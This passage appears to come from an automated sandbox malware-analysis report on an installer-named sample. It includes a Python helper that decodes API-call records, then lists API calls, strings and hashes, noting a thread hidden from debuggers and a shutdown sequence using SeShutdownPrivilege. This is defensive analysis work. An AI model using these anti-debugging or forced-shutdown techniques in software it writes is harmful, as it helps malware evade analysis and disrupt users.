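    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z_]\w*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for an 'Api.MODULE(args), ref: addr' line, else None."""
    m = _CALL_RE.search(line)
    if m is None:
        return None
    args = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def decode_mask(mask: int, table: dict) -> list:
    """Expand an access mask into flag names; leftover bits are reported as hex."""
    names = [name for bit, name in table.items() if mask & bit]
    rest = mask & ~sum(table)
    if rest:
        names.append(f"unknown:0x{rest:x}")
    return names


def decode(call: ApiCall) -> list:
    """Translate the arguments that matter for triage into named constants."""
    notes = []
    a = call.args
    if call.api == "NtSetInformationThread" and len(a) >= 4 and a[1] is not None:
        notes.append(THREAD_INFO_CLASS.get(a[1], f"ThreadInformationClass:0x{a[1]:x}"))
        # ThreadHideFromDebugger takes no buffer: NULL pointer and length 0 is the
        # only accepted form, so (0, 0x11, 0, 0) is the complete anti-debug call.
        if a[1] == 0x11 and a[2] == 0 and a[3] == 0:
            notes.append("anti-debug: thread hidden from debugger")
    elif call.api.startswith("OpenSCManager") and len(a) >= 3 and a[2] is not None:
        notes.extend(decode_mask(a[2], SC_MANAGER_ACCESS))
    elif call.api.startswith("OpenService") and len(a) >= 3 and a[2] is not None:
        notes.extend(decode_mask(a[2], SERVICE_ACCESS))
    return notes


def triage(lines) -> list:
    """Return (api, ref, notes) for every call line that decodes to something."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        if call is not None:
            notes = decode(call)
            if notes:
                out.append((call.api, call.ref, notes))
    return out


def hides_from_debugger(lines) -> bool:
    """True if any NtSetInformationThread call sets ThreadHideFromDebugger."""
    return any("anti-debug: thread hidden from debugger" in n for _, _, n in triage(lines))


if __name__ == "__main__":
    for api, ref, notes in triage(REPORT_LINES):
        print(f"{ref:08X} {api}: {', '.join(notes)}")
```

Run against the records above, the helper reports the call at 6C9E3EAA as ThreadHideFromDebugger with the NULL buffer and zero length that class requires, which is what the "Hides threads from debuggers" signature keys on: once the flag is set, the kernel stops delivering that thread's debug events to an attached debugger. The service calls decode to SC_MANAGER_CONNECT and SERVICE_QUERY_STATUS only, so these two calls can open a service and read its status but cannot create, configure or start one; that would need SC_MANAGER_CREATE_SERVICE or SERVICE_START to appear in the masks.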

                                      Control-flow Graph

                                       control_flow_graph: function spanning 6cb801c3-6cb80572 (nodes 3722-3829); the graph edge list is omitted. Blocks call GetConsoleMode (6cb80447-6cb80456), ReadConsoleW (6cb8045e-6cb80478), ReadFile (6cb804a8-6cb804c0) and GetLastError (6cb8047a, 6cb8051c-6cb80527), plus the internal helpers 6cb730bc, 6cb730cf, 6cb730e2, 6cb73810, 6cb77eab, 6cb77ee5, 6cb7e359, 6cb805ee, 6cb80573, 6cb808a6 and 6cb850d5.
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8Q
                                      • API String ID: 0-4022487301
                                      • Opcode ID: 49470fea0c1ed7e827cf8a09d33374ca9f177a92be9ad6dd8f82a38022a06667
                                      • Instruction ID: a7e594e4e80c7317a0becf77a9df5c87e949e0faae258d172e224f53bf7016ff
                                      • Opcode Fuzzy Hash: 49470fea0c1ed7e827cf8a09d33374ca9f177a92be9ad6dd8f82a38022a06667
                                      • Instruction Fuzzy Hash: 39C1E270A0B2C59FDB01CF99D8A0BEDBBB4EF4A354F144159E820A7B81C7718945CB72

                                      Control-flow Graph

                                       control_flow_graph: function spanning 6cb8775c-6cb87a85 (nodes 3831-3895); the graph edge list is omitted. Blocks call GetFileType (6cb87882-6cb8788b), GetLastError with CloseHandle (6cb8788d-6cb878be), GetLastError (6cb87857-6cb8787d, 6cb87a35-6cb87a61) and CloseHandle (6cb87a00-6cb87a33), plus the internal helpers 6cb87bdc, 6cb730cf, 6cb730bc, 6cb730e2, 6cb84cfc, 6cb87b47, 6cb84ea0, 6cb87d56, 6cb87e00, 6cb7f015 and 6cb84e0f.
                                      APIs
                                        • Part of subcall function 6CB87B47: CreateFileW.KERNEL32(00000000,00000000,?,6CB87805,?,?,00000000,?,6CB87805,00000000,0000000C), ref: 6CB87B64
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB87870
                                      • __dosmaperr.LIBCMT ref: 6CB87877
                                      • GetFileType.KERNEL32(00000000), ref: 6CB87883
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8788D
                                      • __dosmaperr.LIBCMT ref: 6CB87896
                                      • CloseHandle.KERNEL32(00000000), ref: 6CB878B6
                                      • CloseHandle.KERNEL32(6CB7E7C0), ref: 6CB87A03
                                      • GetLastError.KERNEL32 ref: 6CB87A35
                                      • __dosmaperr.LIBCMT ref: 6CB87A3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: 8Q
                                      • API String ID: 4237864984-4022487301
                                      • Opcode ID: de9d409d2499d49109006c2c38f099d5adc8c25eb43ca58ce610f00e74437f37
                                      • Instruction ID: d539615ba9e941d442a40962042f9bbf222b1928faae48a960867eab3297a2ee
                                      • Opcode Fuzzy Hash: de9d409d2499d49109006c2c38f099d5adc8c25eb43ca58ce610f00e74437f37
                                      • Instruction Fuzzy Hash: C7A10332B151859FCF199F68C8A1BAD7BB5EB07328F180159F811BB390D7B58906CB52
                                      APIs
                                      • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6CB3B62F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID: *$,=ym$-=ym$-=ym$B$H
                                      • API String ID: 3934441357-3163594065
                                      • Opcode ID: 3a4dc55e02001829340989c739d9fa14333801f895b665b769631ca0bd49e567
                                      • Instruction ID: 3b88d9ab1b72795a34d2f048356f3c23485c92168b5981768687f9cc3ef76258
                                      • Opcode Fuzzy Hash: 3a4dc55e02001829340989c739d9fa14333801f895b665b769631ca0bd49e567
                                      • Instruction Fuzzy Hash: 4E72BCB16097958FCB14CF28C4A065EBBE1AFC9304F189E1EE499CBB54E734D8858B53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;T55
                                      • API String ID: 0-2572755013
                                      • Opcode ID: af6f60c50f8f60a0417bfe6d3ca778d4749f42f5d208244dfc71111972f1c343
                                      • Instruction ID: 92b739fa049618d5ec12872c20b1c0bddc8e52f806efb2e910c26f5a223930c4
                                      • Opcode Fuzzy Hash: af6f60c50f8f60a0417bfe6d3ca778d4749f42f5d208244dfc71111972f1c343
                                      • Instruction Fuzzy Hash: 0303D331645B018FC729CF28C8D0696B7E3AFD532871D8B6DC0AA4BA95DB74F44ACB50

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: CloseHandle$CreateObjectProcessSingleWait
                                      • String ID: D
                                      • API String ID: 2059082233-2746444292
                                      • Opcode ID: 054325de75e6e59eabdaf36df273f4d8c3efc817c023a628a9b7181ea68f377a
                                      • Instruction ID: 7d6d82e28a96a4384aabe9d302e590db284300cdfec04059a63c4cd8c7c074ea
                                      • Opcode Fuzzy Hash: 054325de75e6e59eabdaf36df273f4d8c3efc817c023a628a9b7181ea68f377a
                                      • Instruction Fuzzy Hash: CE31F2B18193808FD740DF2AD18872AFBF0ABAA318F505A1EF8D986760D7759584CF43

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 6CB7F5A1: GetConsoleCP.KERNEL32(?,6CB7E7C0,?), ref: 6CB7F5E9
                                      • WriteFile.KERNEL32(?,?,6CB87DDC,00000000,00000000,?,00000000,00000000,6CB891A6,00000000,00000000,?,00000000,6CB7E7C0,6CB87DDC,00000000), ref: 6CB7F49F
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000,?,?,?,?,00000000,?), ref: 6CB7F4A9
                                      • __dosmaperr.LIBCMT ref: 6CB7F4EE
                                      Strings
                                      Similarity
                                      • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                      • String ID: 8Q
                                      • API String ID: 251514795-4022487301
                                      • Opcode ID: 3720789ba1b58f005738adfe3a19ffd6a4ccabbfffe856476174a2aecadba97f
                                      • Instruction ID: 91b2adf1b9ed88a8f8d60c95ad156bbaabc3d8b3ea76230b8dce46771d3fbc90
                                      • Opcode Fuzzy Hash: 3720789ba1b58f005738adfe3a19ffd6a4ccabbfffe856476174a2aecadba97f
                                      • Instruction Fuzzy Hash: B951E671A0428AAFDF21CFA8C880BEEBBB9EF0A358F140555DC30A7A41D774D9458779

                                      Control-flow Graph

                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CB69421
                                      Strings
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 323602529-1866435925
                                      • Opcode ID: 40fa7e348482be8d907f9ca8ba4123da7bd5e060761243721a043b4e0851e713
                                      • Instruction ID: 1a7d75e94dab0b23992440f6b6343f89840feafcd6e51ccac7a5e20c78cac342
                                      • Opcode Fuzzy Hash: 40fa7e348482be8d907f9ca8ba4123da7bd5e060761243721a043b4e0851e713
                                      • Instruction Fuzzy Hash: FE5134B5900B408FD725CF26C585BA7BBF1FB49318F008A2DD8964BB91D775A909CF90

                                      Control-flow Graph

                                      APIs
                                      • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CB3CFE1
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 6e21b3e226c63f07bbdd708b3194a026d6f94efb41618eb29b714e2bdca4250c
                                      • Instruction ID: 8c6da49f3dc83d8c49788008da5bba083236f101bd9d8a7853cdcc752ad48a54
                                      • Opcode Fuzzy Hash: 6e21b3e226c63f07bbdd708b3194a026d6f94efb41618eb29b714e2bdca4250c
                                      • Instruction Fuzzy Hash: 1B714EB0259390AFDB10DF69C884B9ABBF4FF89708F50592EF498C6650D375D9488F82

                                      Control-flow Graph

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: @*Z$@*Z
                                      • API String ID: 0-2842812045
                                      • Opcode ID: ae9741cba97f634a4643da7a884dc47f3702ccf00dd6900d4e2d9c4f41152a4b
                                      • Instruction ID: 46922d2d7bae48d781af239d90337d4e52225a35853106a26b7350e71b8b2c26
                                      • Opcode Fuzzy Hash: ae9741cba97f634a4643da7a884dc47f3702ccf00dd6900d4e2d9c4f41152a4b
                                      • Instruction Fuzzy Hash: A04268746093A28FCB14DF68C48166EBBE1ABC9304F245E2EF49AC7761D331D9458B43

                                      Control-flow Graph

                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,6CB8794F), ref: 6CB7F06B
                                      • GetLastError.KERNEL32(?,00000000,?,6CB8794F), ref: 6CB7F075
                                      • __dosmaperr.LIBCMT ref: 6CB7F0A0
                                      Similarity
                                      • API ID: CloseErrorHandleLast__dosmaperr
                                      • String ID:
                                      • API String ID: 2583163307-0
                                      • Opcode ID: 9d735fff4398a8041f972015c862c1bb29d06f1ea445f847aa02d69fe0bedc25
                                      • Instruction ID: c199874004fd966ab2fa477d769347dd1d39365da1cb11ce865b4157fa2ca42e
                                      • Opcode Fuzzy Hash: 9d735fff4398a8041f972015c862c1bb29d06f1ea445f847aa02d69fe0bedc25
                                      • Instruction Fuzzy Hash: 8A018E3370A2E01AC2311A39996CBBE6B6DCB8373CF294659ED3487BC0DF60844447B5

                                      Control-flow Graph

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: 8Q
                                      • API String ID: 0-4022487301
                                      • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                      • Instruction ID: 5354c7b07723b1dcdf0313df45b0bd9720e1f70aa9946b7104b9f7a78012cf0c
                                      • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                      • Instruction Fuzzy Hash: 91F0AD325156A05AD7315A299C007DF32A8CF4237AF210B15ED34A6ED0DB74D40A8FB6
                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CB691A4
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CB691E4
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_
                                      • String ID:
                                      • API String ID: 323602529-0
                                      • Opcode ID: 572c7429199bc4ba0d015fffd0ce12a13fd3e369b46dba30da99b86abfcf9a13
                                      • Instruction ID: 4090a7c840773efaa14488dcfb187642af73c57dd40114697cfba1c6299d8353
                                      • Opcode Fuzzy Hash: 572c7429199bc4ba0d015fffd0ce12a13fd3e369b46dba30da99b86abfcf9a13
                                      • Instruction Fuzzy Hash: 10516671601B40DBD725CF25C884BE6BBF4FB05718F448A1CD4AA8BBA1CB31B949CB80
                                      APIs
                                      • GetLastError.KERNEL32(6CB99DD0,0000000C), ref: 6CB72642
                                      • ExitThread.KERNEL32 ref: 6CB72649
                                      Similarity
                                      • API ID: ErrorExitLastThread
                                      • String ID:
                                      • API String ID: 1611280651-0
                                      • Opcode ID: c5bc9faf4f94a5a09eb6a07a21afbe86660ea4911f56a5c7537d7c574e92d9cf
                                      • Instruction ID: 765d17b86a3f1257f44ae21c65573d10b5c6c06f9cd95149a98024799fa3b605
                                      • Opcode Fuzzy Hash: c5bc9faf4f94a5a09eb6a07a21afbe86660ea4911f56a5c7537d7c574e92d9cf
                                      • Instruction Fuzzy Hash: B7F0C271A00245EFDF109FB1C84DAAE3B74FF46714F240549E821A7B51CB719945CBB2
                                      APIs
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      • Opcode ID: a1fdb9f93033f085445b77c130aa40affd646018561b3965a5a432394c234c7b
                                      • Instruction ID: 3d9f05f155115f1ef614ec9ce915c55361f4784c5681ee228c098efa594bcba8
                                      • Opcode Fuzzy Hash: a1fdb9f93033f085445b77c130aa40affd646018561b3965a5a432394c234c7b
                                      • Instruction Fuzzy Hash: 72116671A0424AAFCB05CF59E9449DF3BF8EF48308F1444A9F818AB311D670E911CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                      • Instruction ID: 03cb539007bbe1395cbc546aac5b84fe1b167be174e8713652430634b9e30acd
                                      • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                      • Instruction Fuzzy Hash: 17014F72D0119AAFCF019FA88C00AEE7FB5EF18218F144165FD24F2650E7718A24DB91
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000000,?,6CB87805,?,?,00000000,?,6CB87805,00000000,0000000C), ref: 6CB87B64
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 4a1057e02098c2080f41aa6b3cd098486acc6b51ecb94ceda0f289ae1cfc5ef7
                                      • Instruction ID: acc55e5fd39bbba67b28dea27f2796328a867489d646e2be3cbf24eaf524251a
                                      • Opcode Fuzzy Hash: 4a1057e02098c2080f41aa6b3cd098486acc6b51ecb94ceda0f289ae1cfc5ef7
                                      • Instruction Fuzzy Hash: 22D06C3210014DBBDF028F84DD06EDA3BAAFB49715F014000BA1866020C772E861AB94
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                      • Instruction ID: b6fde1bec8d56d1f1e1dcd38c558eabe520a6f84e0b2f2bec81005eb98f2e1c2
                                      • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                      • Instruction Fuzzy Hash:
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBB6097
                                        • Part of subcall function 6CBB91D6: __EH_prolog.LIBCMT ref: 6CBB91DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $ $*$0UJ$@$@
                                      • API String ID: 3519838083-862571645
                                      • Opcode ID: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                      • Instruction ID: 471a6aeb5d2cc6b82704da2fd8e75ead187c61164f8f02bbcdd51b459a817a8f
                                      • Opcode Fuzzy Hash: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                      • Instruction Fuzzy Hash: B9333930D002999BDF15DFA4C890BEDBBB1EF55308F1080A9E449BBA51DB719E89CF52
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CC088A4
                                      • __aulldiv.LIBCMT ref: 6CC08C4A
                                      • __aulldiv.LIBCMT ref: 6CC08C78
                                      • __aulldiv.LIBCMT ref: 6CC08D18
                                        • Part of subcall function 6CC0A36D: __EH_prolog.LIBCMT ref: 6CC0A372
                                        • Part of subcall function 6CC0A40E: __EH_prolog.LIBCMT ref: 6CC0A413
                                        • Part of subcall function 6CC09E78: __EH_prolog.LIBCMT ref: 6CC09E7D
                                        • Part of subcall function 6CC0424A: __EH_prolog.LIBCMT ref: 6CC0424F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog$__aulldiv
                                      • String ID: L$b
                                      • API String ID: 604474441-3566554212
                                      • Opcode ID: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                      • Instruction ID: bb1cb9dbd3bd3ebbb9460789cb05bc6bfeec81d956afeaf63ca2491728a01e41
                                      • Opcode Fuzzy Hash: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                      • Instruction Fuzzy Hash: 8CE28A30E05299DFCF15CFA4C990BDCBBB5AF15308F14819AD449A7B41EB326E89CB61
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: C
                                      • API String ID: 4218353326-4157497815
                                      • Opcode ID: 079437087de6136148288acc1ae62cc2d30fa20031eeed00fa77cf8a695496c9
                                      • Instruction ID: 4ab700715c3826c1771386bea6edaf50c2d9e967976c5c0362e20f61c88768ff
                                      • Opcode Fuzzy Hash: 079437087de6136148288acc1ae62cc2d30fa20031eeed00fa77cf8a695496c9
                                      • Instruction Fuzzy Hash: F973F471644B418FC728CF2AC8D0A96B3F2EF953187198B6DC09787E95EB74B54ACB40
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 6CB6945A
                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CB69466
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CB69474
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CB6949B
                                      • NtInitiatePowerAction.NTDLL ref: 6CB694AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3256374457-3733053543
                                      • Opcode ID: e62701cd68cea30dc9a40c5524a385dd47038d6fca2241438d6a5dbf59c779bf
                                      • Instruction ID: 7bca3e9f5cbeb21909586756be20d404e9bd13283d9f4b90af9cddf442597b4f
                                      • Opcode Fuzzy Hash: e62701cd68cea30dc9a40c5524a385dd47038d6fca2241438d6a5dbf59c779bf
                                      • Instruction Fuzzy Hash: 60F05B706453047BE6006F25CE0EBAA7BB4EF45701F004958F945971D1D770A994DB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
